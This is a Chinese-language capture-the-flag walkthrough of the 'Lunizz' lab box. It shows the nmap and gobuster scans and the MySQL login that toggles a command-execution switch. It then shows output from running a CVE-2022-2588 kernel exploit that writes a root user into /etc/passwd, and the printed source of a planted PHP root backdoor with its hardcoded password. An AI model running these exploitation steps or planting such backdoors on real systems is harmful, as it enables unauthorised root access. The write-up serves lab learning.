Lunizz CTF
端口扫描
root@ip-10-10-139-140:~/lunizzctfnd# nmap -sTCV -p 80,3306,4444,5000 --min-rate 1000 10.10.9.166
Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-03 10:08 BST
Nmap scan report for ip-10-10-9-166.eu-west-1.compute.internal (10.10.9.166)
Host is up (0.00019s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open mysql MySQL 5.7.33-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.7.33-0ubuntu0.18.04.1
| Thread ID: 5
| Capabilities flags: 65535
| Some Capabilities: LongPassword, Support41Auth, LongColumnFlag, InteractiveClient, FoundRows, SupportsCompression, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, SupportsTransactions, ODBCClient, IgnoreSigpipes, Speaks41ProtocolNew, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, ConnectWithDatabase, Speaks41ProtocolOld, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: 5bQ.\x19\x02\\x02"#\x17r\x1C:@HOaP0
|_ Auth Plugin Name: 96
4444/tcp open tcpwrapped
5000/tcp open tcpwrapped
MAC Address: 02:4B:D8:FC:FB:D5 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
80
root@ip-10-10-139-140:~/lunizzctfnd# gobuster dir -u http://10.10.9.166/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.9.166/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
2023/10/03 10:10:10 Starting gobuster
===============================================================
/index.html (Status: 200)
/instructions.txt (Status: 200)
/hidden (Status: 301)
/whatever (Status: 301)
/server-status (Status: 403)
===============================================================
2023/10/03 10:20:03 Finished
===============================================================
访问扫描出来的文件:
- instructions.txt : 告知了 Mysql 的账号
- hidden : 一个文件上传的位置限制了上传的类型
- whatever : 命令执行的位置, 但是我执行没有任何效果, 但是在其上有一个标识, 感觉是这个应该是开关
3306
利用得到的账号访问数据库, 发现其中的数据表中只有一个列, 从数据表的名称 runchek 推断这应该就是我们的开关, 所以我将其修改为 1 并回到 80 端口进行执行
root@ip-10-10-139-140:~/lunizzctfnd# mysql -h 10.10.9.166 -u runcheck -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 5.7.33-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| runornot |
+--------------------+
2 rows in set (0.02 sec)
mysql> use runornot;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+--------------------+
| Tables_in_runornot |
+--------------------+
| runcheck |
+--------------------+
1 row in set (0.02 sec)
mysql> SELECT * FROM runcheck;
+------+
| run |
+------+
| 0 |
+------+
1 row in set (0.02 sec)
mysql> UPDATE runcheck SET run=1;
Query OK, 1 row affected (0.01 sec)
Rows matched: 1 Changed: 1 Warnings: 0
mysql> SELECT * FROM runcheck;
+------+
| run |
+------+
| 1 |
+------+
1 row in set (0.00 sec)
80
首先我们可以看到原本的 mode 已经发生改变了
后渗透
www-data
利用上面的命令注入获取一个 Shell
www-data —> root
执行 linpeas 发现一个 CVE 漏洞我们可以利用此来进行提权
但是在我利用时发现无法使用
看了论坛后其提示我使用另一个漏洞 GitHub - Markakd/CVE-2022-2588: exploit for CVE-2022-2588
(remote) www-data@lunizz:/tmp$ ./exp_file_credential
self path /tmp/./exp_file_credential
prepare done
Old limits -> soft limit= 4096 hard limit= 4096
starting exploit, num of cores: 1
defrag done
spray 256 done
freed the filter object
256 freed done
double free done
spraying files
found overlap, id : 13, 318
start slow write
closed overlap
got cmd, start spraying /etc/passwd
spray done
write done, spent 1.381854 s
should be after the slow write
succeed
(remote) www-data@lunizz:/tmp$ cat /etc/passwd
user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash # 密码是 user
(remote) www-data@lunizz:/tmp$ su user
Password:
\[\](remote)\[\] \[\]user@lunizz\[\]:\[\]/tmp\[\]$ id
uid=0(user) gid=0(root) groups=0(root)
扩展
8080
如果你查看进程你会发现其在 8080 端口以 root 身份运行了一个程序, 我们可以使用端口转发将其代理处理, 但是其需要密码进行连接, 我们可以通过查看源代码进行了解. 可以看成这是一个后门
\[\](remote)\[\] \[\]user@lunizz\[\]:\[\]/root\[\]$ cat index.php
<?php
if ($_SERVER['REQUEST_METHOD'] == "POST") {
if (isset($_POST['password']) and $_POST['password'] == "northernlights") {
if (isset($_POST['cmdtype'])) {
if ($_POST['cmdtype'] == "passwd") { system("echo -n 'northernlights\nnorthernlights' | passwd"); echo "<br>Password Changed To :northernlights<br>"; }
if ($_POST['cmdtype'] == "lsla") { system("ls -al /root"); }
if ($_POST['cmdtype'] == "reboot") { system("reboot"); }
}
} else {
echo "Wrong Password [your place ;)]!! \n";
}
}
?>
**********************************************************
* Mason's Root Backdoor *
* *
* Please Send Request (with "password" and "cmdtype") *
* *
**********************************************************
-------------CMD TYPES-------------
lsla
reboot
passwd
